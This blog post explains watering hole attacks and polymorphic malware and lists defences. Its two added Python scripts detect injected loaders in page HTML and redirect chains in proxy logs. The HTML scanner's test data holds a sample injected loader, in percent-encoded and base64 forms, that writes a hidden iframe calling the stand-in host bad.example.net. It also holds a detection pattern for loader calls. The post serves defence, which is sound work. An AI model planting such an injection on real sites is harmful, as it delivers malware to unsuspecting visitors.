Watering hole attacks: how APTs and cybercriminals infiltrate secure infrastructure

My first encounter with the world of cybercrime was many years ago, through a watering hole campaign. I visited a Persian website and found that it was pushing malware to visitors' browsers. I immediately contacted the site administrator, who told me they had no technical knowledge of the problem. It became apparent that they were using an outdated CMS with well-known security vulnerabilities, which criminals were exploiting to target specific audiences and spread malware.
Watering hole attacks are among the methods favored by cybercriminals and advanced persistent threats (APTs). In these attacks, the adversary uses a tactic called "strategic web compromise" (SWC) to gain a foothold in the victim organization's network. By identifying websites that the target users visit frequently, the attacker compromises those websites, plants malicious content on them, and delivers malware to the unsuspecting user's device when the page is loaded.
Malware used in watering hole attacks is designed to evade detection and to persist on the target's device, giving the attacker continuing access to sensitive information. Such an attack is of particular concern because it can go unnoticed for a long time, and the attacker keeps collecting data for as long as it does.
One type of malware commonly used in watering hole attacks is polymorphic malware: malicious software designed to keep changing its code and appearance so that antivirus software and other signature-based controls do not recognize it. It is particularly dangerous because it can mutate into many different forms, making it hard for traditional antivirus and anti-malware tools to detect and remove. Polymorphic malware changes its appearance through techniques such as encryption, compression, and randomization; the decoded payload and its behavior, however, stay the same, which is what behavior- and content-based detection relies on.
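The two points above (a compromised site serving an injected loader, and the same injection turning up in different encodings) can be checked from the site owner's side. The script below is an added example, not code from the original post: it scans a page's HTML for hidden iframes, scripts loaded from hosts outside an allowlist, and inline scripts that unpack obfuscated code. Inline scripts are normalised first (`unescape()` and `atob()` wrappers, percent- and `\xNN`-encoding are decoded), so two differently encoded copies of one injection produce the same fingerprint even though their raw hashes differ. The host allowlist, the `bad.example.net` loader and all sample HTML are constructed for the demo.

```python
"""Spot a watering-hole injection in a page's HTML (added example, not from the post)."""
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical first-party hosts allowed to serve scripts on the site being checked.
ALLOWED_SCRIPT_HOSTS = {"example.org", "www.example.org", "cdn.example.org"}
# Calls an injected loader typically uses to unpack and write its payload.
LOADER_CALLS = re.compile(r"\b(eval|unescape|atob|String\.fromCharCode|document\.write)\s*\(")


class _Collector(HTMLParser):
    """Collect iframe attributes and script tags (src plus inline body)."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []
        self._src, self._buf = None, None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "script":
            self._src, self._buf = a.get("src"), []

    def handle_data(self, data):
        if self._buf is not None:          # inside <script>...</script>
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def _b64(s):
    try:
        return base64.b64decode(s, validate=True).decode("utf-8", "replace")
    except ValueError:
        return s


def normalise(js):
    """Peel the cheap encoding layers an injected loader usually wears."""
    for _ in range(3):                     # layers may be nested; three rounds for the demo
        before = js
        js = re.sub(r'atob\(\s*"([A-Za-z0-9+/=]+)"\s*\)', lambda m: _b64(m.group(1)), js)
        js = re.sub(r'unescape\(\s*"([^"]*)"\s*\)', r"\1", js)      # drop wrapper, keep text
        js = re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), js)
        js = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), js)
        if js == before:
            break
    return js


def is_hidden(iframe):
    style = iframe.get("style", "").replace(" ", "").lower()
    return (iframe.get("width") == "0" or iframe.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style)


def fingerprint(js):
    """Hash of the decoded loader: stable across re-encodings of one injection."""
    return hashlib.sha256(normalise(js).encode()).hexdigest()


def scan(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (indicator, detail) findings for one page."""
    page = _Collector()
    page.feed(html)
    findings = [("hidden_iframe", f.get("src", "")) for f in page.iframes if is_hidden(f)]
    for src, body in page.scripts:
        if src:
            host = urlparse(src).hostname or ""
            if host and host not in allowed_hosts:
                findings.append(("foreign_script", src))
            continue
        decoded = normalise(body)
        if LOADER_CALLS.search(body) or LOADER_CALLS.search(decoded):
            inner = _Collector()          # the unpacked code is usually a hidden iframe
            inner.feed(decoded)
            findings += [("hidden_iframe_in_script", f.get("src", ""))
                         for f in inner.iframes if is_hidden(f)]
            findings.append(("obfuscated_loader", fingerprint(body)))
    return findings


# Constructed samples: one payload, two encodings of the same loader.
PAYLOAD = '<iframe src="http://bad.example.net/l.php" width="0" height="0"></iframe>'
VARIANT_A = 'document.write(unescape("' + "".join("%%%02X" % b for b in PAYLOAD.encode()) + '"));'
VARIANT_B = 'document.write(atob("' + base64.b64encode(PAYLOAD.encode()).decode() + '"));'
CLEAN_PAGE = '<html><body><script src="https://cdn.example.org/app.js"></script></body></html>'
INFECTED_A = "<html><body><p>news</p><script>" + VARIANT_A + "</script></body></html>"
INFECTED_B = "<html><body><p>news</p><script>" + VARIANT_B + "</script></body></html>"

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("A", INFECTED_A), ("B", INFECTED_B)]:
        print(name, scan(page))
```

Run against a crawl of your own site and diff the findings between crawls; a foreign script host or a non-empty `obfuscated_loader` list appearing between two runs of the same page is the signal an outdated CMS typically gives before anyone notices.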
Watering hole attacks are especially dangerous for small businesses, which are often targeted because their security measures are weaker than those of larger enterprises. Even large organizations and government agencies, however, have fallen victim to watering hole attacks.
Below are some steps you can take to reduce the risk of becoming a victim of this type of attack:
- Use web filtering: web filtering tools block access to malicious or unknown websites and web pages, which prevents users from unknowingly downloading malware from the watering hole.
- Use next-generation antivirus (NGAV): NGAV solutions use detection techniques such as machine learning and behavioral analytics to identify and respond to new and previously unknown threats, including variants that static signatures miss.
- Implement endpoint detection and response (EDR): EDR solutions monitor endpoints such as laptops and desktops for suspicious behavior and can respond to threats in real time.
- Implement network detection and response (NDR): NDR solutions monitor network traffic for suspicious activity and can detect and respond to threats that traditional antivirus software may miss.
- Use threat intelligence: threat intelligence services provide information about emerging threats, including polymorphic malware. You can use this information to identify potential threats and take appropriate action to protect your network.
- Implement a zero-trust network: zero trust is a security model that treats every user and device on the network as a potential threat. Users must authenticate before they can access resources on the network, and access is restricted to what is necessary.
- Use network segmentation: network segmentation separates critical systems and sensitive data from the rest of the network, which limits how far malware can spread if an attack succeeds.
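The web filtering and NDR items above both come down to one question: which hosts are your users fetching active content from, and how did they get there? The script below is an added example, not code from the original post, showing the detection logic a watering hole leaves in web proxy logs: several internal clients visit the same trusted site and, seconds later, each pulls the same resource from a host the organisation has never contacted before, with the trusted site as the referrer. The baseline of known hosts, the log field order and the log lines are all constructed for the demo; map the fields to your own proxy's format.

```python
"""Hunt for a watering-hole redirect chain in proxy logs (added example, not from the post)."""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Hypothetical baseline: hosts the organisation contacted over the previous 30 days.
KNOWN_HOSTS = {"news.example.org", "cdn.example.org", "mail.example.com", "updates.example.com"}
# Content types worth flagging when fetched from a first-seen host.
ACTIVE_TYPES = {"application/javascript", "text/javascript", "application/octet-stream",
                "application/x-msdownload", "application/java-archive"}
MIN_CLIENTS = 2                     # same new host via the same trusted site
WINDOW = timedelta(seconds=30)      # how soon a follow-up download must happen

# Constructed log: timestamp client method url status content-type referer ("-" if none)
LOG = """\
2024-03-04T09:00:01 10.1.2.10 GET https://news.example.org/ 200 text/html -
2024-03-04T09:00:02 10.1.2.10 GET https://cdn.example.org/site.js 200 application/javascript https://news.example.org/
2024-03-04T09:00:03 10.1.2.10 GET https://stats.fancy-analytics.example/s.js 200 application/javascript https://news.example.org/
2024-03-04T09:00:04 10.1.2.10 GET https://stats.fancy-analytics.example/u.php 200 application/octet-stream https://stats.fancy-analytics.example/s.js
2024-03-04T09:05:11 10.1.2.23 GET https://news.example.org/ 200 text/html -
2024-03-04T09:05:12 10.1.2.23 GET https://stats.fancy-analytics.example/s.js 200 application/javascript https://news.example.org/
2024-03-04T09:05:13 10.1.2.23 GET https://stats.fancy-analytics.example/u.php 200 application/octet-stream https://stats.fancy-analytics.example/s.js
2024-03-04T09:20:40 10.1.2.57 GET https://news.example.org/ 200 text/html -
2024-03-04T09:20:41 10.1.2.57 GET https://stats.fancy-analytics.example/s.js 200 application/javascript https://news.example.org/
2024-03-04T10:02:00 10.1.2.88 GET https://mail.example.com/ 200 text/html -
2024-03-04T10:02:05 10.1.2.88 GET https://blog.someone.example/post 200 text/html https://mail.example.com/
"""


def parse(log):
    """Turn the constructed log into dicts with host and referrer host resolved."""
    rows = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, ctype, referer = line.split()
        rows.append({"ts": datetime.fromisoformat(ts), "client": client, "url": url,
                     "host": urlparse(url).hostname, "status": int(status), "ctype": ctype,
                     "ref_host": urlparse(referer).hostname if referer != "-" else None})
    return rows


def find_watering_holes(rows, known_hosts=KNOWN_HOSTS, min_clients=MIN_CLIENTS):
    """Group first-seen hosts by the trusted referrer that led clients to them."""
    chains = defaultdict(lambda: {"clients": set(), "downloads": set()})
    for i, r in enumerate(rows):
        # Skip familiar hosts, and new hosts that were not reached from a trusted site.
        if r["host"] in known_hosts or r["ref_host"] not in known_hosts:
            continue
        key = (r["ref_host"], r["host"])
        chains[key]["clients"].add(r["client"])
        # Did the same client then pull active content from the new host within WINDOW?
        for f in rows[i:]:
            if f["ts"] - r["ts"] > WINDOW:
                break
            if f["client"] == r["client"] and f["host"] == r["host"] and f["ctype"] in ACTIVE_TYPES:
                chains[key]["downloads"].add((f["client"], f["url"]))
    alerts = []
    for (ref_host, host), c in chains.items():
        if len(c["clients"]) >= min_clients:      # one client is noise; several is a pattern
            alerts.append({"trusted_site": ref_host, "new_host": host,
                           "clients": sorted(c["clients"]), "downloads": sorted(c["downloads"])})
    return alerts


if __name__ == "__main__":
    for a in find_watering_holes(parse(LOG)):
        print(f"{a['new_host']} reached via {a['trusted_site']} by {len(a['clients'])} clients; "
              f"{len(a['downloads'])} active-content fetches")
```

The single client that followed a link from the mail site to a blog is not reported: one person visiting a new host is normal browsing, while three unrelated clients being sent from the same trusted page to the same unknown script host, and then fetching an octet-stream from it, is the shape of a compromised page. Segmentation and least-privilege access decide what that octet-stream can reach once it runs; this check is about noticing it early.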
Article disclaimer
The views, information, or opinions expressed are solely those of the author and do not necessarily represent those of his employer or the organizations with which he is affiliated.
The information contained in this post is for general information purposes only. The information is provided by Farhad Mofidi and, while he strives to keep the information current and accurate, he does not make any representations or warranties of any kind, express or implied, regarding the completeness, accuracy, reliability, suitability or availability of the website, or of any information, products or related graphics contained in any post, for any purpose.
Also, AI may be employed as a tool to provide suggestions and improve some of the contents or sentences. The ideas, thoughts, opinions and final product are original and produced by the author himself.